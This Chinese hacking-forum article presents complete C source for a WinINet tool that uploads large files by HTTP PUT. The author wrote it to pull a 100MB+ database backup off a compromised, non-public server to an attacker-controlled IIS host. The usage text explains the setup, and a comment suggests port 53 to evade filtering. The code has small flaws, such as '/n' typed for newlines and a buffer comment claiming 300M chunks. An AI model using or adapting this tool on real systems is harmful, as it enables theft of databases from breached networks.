用PUT方式上传大文件

信息来源：邪恶八进制信息安全团队(www.eviloctal.com)
注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
最近做一个渗透,目标机为一台数据库服务器,对外没有开放,只能反连出来,上面有个100多M的数据库备份,用后门下载的时候总是掉线,听mickey说用PUT方式可以上传大文件,于是从网上找找了代码,写了个命令行下上传大文件的C程序.
代码:
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <wininet.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")
void Usage (char *name);//帮助信息
BOOL UseHttpSendReqEx(HINTERNET hConnect, TCHAR *upFile, TCHAR *localFile)
{
INTERNET_BUFFERS BufferIn = {0};
DWORD dwBytesRead;
DWORD dwBytesWritten;
BYTE pBuffer[302480]; // Read from file in 300M chunks,最大支持300M文件
BOOL bRead, bRet;
BufferIn.dwStructSize = sizeof( INTERNET_BUFFERS );
//使用put方式上传文件:
HINTERNET hRequest = HttpOpenRequest (hConnect, "PUT",
localFile, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (!hRequest)
{
printf("Failed to open request handle: %lu/n", GetLastError ());
return FALSE;
}
//打开指定的文件:
HANDLE hFile = CreateFile (upFile, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("/nFailed to open local file %s.", upFile);
return FALSE;
}
BufferIn.dwBufferTotal = GetFileSize (hFile, NULL);
printf ("File size is %d/n", BufferIn.dwBufferTotal );
if(!HttpSendRequestEx( hRequest, &BufferIn, NULL, HSR_INITIATE, 0))
{
printf( "Error on HttpSendRequestEx %lu/n",GetLastError() );
return FALSE;
}
DWORD sum = 0;
do
{
if  (!(bRead = ReadFile (hFile, pBuffer, sizeof(pBuffer),&dwBytesRead, NULL)))
{
printf ("/nReadFile failed on buffer %lu.",GetLastError());
break;
}
if (!(bRet=InternetWriteFile( hRequest, pBuffer, dwBytesRead,&dwBytesWritten)))
{
printf ("/nInternetWriteFile failed %lu", GetLastError());
break;
}
sum += dwBytesWritten;
}
while (dwBytesRead == sizeof(pBuffer)) ;
CloseHandle (hFile);
printf ("Actual written bytes: %d/nupload %s successed!/n", sum,localFile);
//结束一个HTTP请求:
if(!HttpEndRequest(hRequest, NULL, 0, 0))
{
printf( "Error on HttpEndRequest %lu /n", GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char **argv)
{
//put 127.0.0.1 /1.db c://wmpub//1.exe
if(argc!=4)
{
Usage(argv[0]);
return 0;
}
//char *ServerName="127.0.0.1"; //这里填写URL地址
char *ServerName=argv[1];
HINTERNET hSession = InternetOpen("HttpSendRequest",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); //同步方式
if(!hSession){
printf("Failed to open InternetOpen/n");
exit(0);
}
//连接到一个http服务:
HINTERNET hConnect = InternetConnect(hSession,
ServerName,
INTERNET_DEFAULT_HTTP_PORT, //连接到80端口,可以修改成任意端口,比如53
NULL,
NULL,
INTERNET_SERVICE_HTTP, //服务类型HTTP，FTP或Gopher
0,
1);
if(!hConnect)
{
printf("error InternetConnect/n");
return 0;
}
//TCHAR *putfile="c://wmpub//1.exe"; //上传的程序
TCHAR *putfile=argv[3];
TCHAR *putlocalfile=argv[2];
BOOL sigh;
sigh=UseHttpSendReqEx(hConnect,putfile,putlocalfile);
if(!sigh)
{
printf("error UseHttpSendReqEx/n");
return 0;
}
return 0;
}
//输出帮助的典型方法:
void Usage (char *name)
{
fprintf(stderr,"===============================================================================/n"
"/t名称：利用PUT上传300M的大文件/n"
"/t环境：Win2003+Visual C++ 6.0/n"
"/t作者：pt007@vip.sina.com/n"
"/tQQ：  7491805/n"
"/t声明：本软件由pt007原创，转载请注明出处，谢谢!/n"
"/t使用说明:1.db为上传后保存后的文件,c://wmpub//1.exe为本地要上传的大文件,/n/t需要IIS里面设置允许写入!/n"
"/t例子:%s 192.168.1.101 /1.db c://wmpub//1.exe/n"
"===============================================================================/n",name);
}
本文来源于：Chinadu`s Blog http://www.4shell.org  原文地址： http://www.4shell.org/archives/888.html